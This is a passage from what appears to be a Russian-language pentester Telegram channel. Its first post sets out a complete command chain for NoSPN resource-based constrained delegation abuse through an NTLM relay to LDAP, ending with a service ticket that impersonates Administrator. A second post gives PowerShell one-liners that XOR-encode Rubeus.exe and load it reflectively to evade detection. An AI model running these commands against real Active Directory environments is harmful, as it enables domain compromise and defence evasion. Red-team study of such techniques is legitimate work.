❤2
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯1
#rbcd #relay #ntlmrelayx #upn #nospn #lpe
При наличии возможности вызвать relay на ldap от имени машинной УЗ (например, при включенном WebDav), машинную УЗ можно скомпрометировать.
Основная причина заключается в том что, машинная уз может сама себе устаналивать параметр msDS-AllowedToActOnBehalfOfOtherIdentity - фактически указывать SPN/UPN произвольной УЗ. Дальнейшее использование этой УЗ позволит скомпоометировать машину (классический RBCD).
Интересно то, что для эксплуатации можно использовать как вспомогательную машинную УЗ или, при maq=0, УЗ пользователя.
Снизу представлен "POC" для эксплуатации NoSPN RBCD через Relay
При наличии возможности вызвать relay на ldap от имени машинной УЗ (например, при включенном WebDav), машинную УЗ можно скомпрометировать.
Основная причина заключается в том что, машинная уз может сама себе устаналивать параметр msDS-AllowedToActOnBehalfOfOtherIdentity - фактически указывать SPN/UPN произвольной УЗ. Дальнейшее использование этой УЗ позволит скомпоометировать машину (классический RBCD).
Интересно то, что для эксплуатации можно использовать как вспомогательную машинную УЗ или, при maq=0, УЗ пользователя.
Снизу представлен "POC" для эксплуатации NoSPN RBCD через Relay
#Check RBCD (Empty)
rbcd.py -delegate-to 'target$' -dc-ip 'DC_IP' -action 'read' 'domain'/'controlledaccountwithoutSPN':'SomePassword'
# To set RBCD
ntlmrelayx.py -t ldap://'DC_IP' --delegate-access --escalate-user 'controlledaccountwithoutSPN'
#Check RBCD (With SID of controlledaccountwithoutSPN)
rbcd.py -delegate-to 'target$' -dc-ip 'DC_IP' -action 'read' 'domain'/'controlledaccountwithoutSPN':'SomePassword'
# Obtain a TGT through overpass-the-hash to use RC4
getTGT.py -hashes :$(pypykatz crypto nt 'SomePassword') 'domain'/'controlledaccountwithoutSPN'
# Obtain the TGT session key
describeTicket.py 'TGT.ccache' | grep 'Ticket Session Key'
# Change the controlledaccountwithoutSPN's NT hash with the TGT session key
changepasswd.py -newhashes :TGTSessionKey 'domain'/'controlledaccountwithoutSPN':'SomePassword'@'DomainController'
# Obtain the delegated service ticket through S4U2self+U2U, followed by S4U2proxy (the steps could be conducted individually with the -self and -additional-ticket flags)
KRB5CCNAME='TGT.ccache' getST.py -u2u -impersonate "Administrator" -spn "host/target.domain.com" -k -no-pass 'domain'/'controlledaccountwithoutSPN'
# The password can then be reset to its old value (or another one if the domain policy forbids it, which is usually the case)
smbpasswd.py -hashes :TGTSessionKey -newhashes :OldNTHash 'domain'/'controlledaccountwithoutSPN'@'DomainController'
👍1🔥1
Forwarded from shit notes
🔥1
This media is not supported in the widget
VIEW IN TELEGRAM
Pentester`s Notes
This media is not supported in the widget
VIEW IN TELEGRAM
Чтобы было под рукой.
#xor #encode #bypass
$key = [byte][char]'A'; [byte[]]$data = Get-Content "C:\users\lab\desktop\redteam\Rubeus.exe" -Encoding Byte; $xored = $data | ForEach-Object { $_ -bxor $key }; [Convert]::ToBase64String($xored) | Set-Content "encoded.txt"
$key = [byte][char]'A'; $b64 = Get-Content "encoded.txt"; $bytes = [Convert]::FromBase64String($b64); $decoded = $bytes | ForEach-Object { $_ -bxor $key }; [System.Reflection.Assembly]::Load([byte[]]$decoded)#xor #encode #bypass
🔥1😍1
Многие спрашивают "как вкатиться в ИБ?", "сложно ли это?", "Какая у тебя зарплата?" и т.д.
В данной статье развеивается ряд мифов и даются ответы на ряд вопросов.
https://habr.com/ru/companies/netologyru/articles/956702/
В данной статье развеивается ряд мифов и даются ответы на ряд вопросов.
https://habr.com/ru/companies/netologyru/articles/956702/
Хабр
Вся правда о карьере в ИБ: разбираем мифы про хакеров и высокие зарплаты
Кибербезопасность сегодня выглядит как одна из самых заметных сфер в IT: о ней много говорят, специалистов не хватает, а зарплаты обсуждают даже в общих чатах...
Кто до сих пор думает, что айтишники много получают... вот типичный представитель redteam-команды.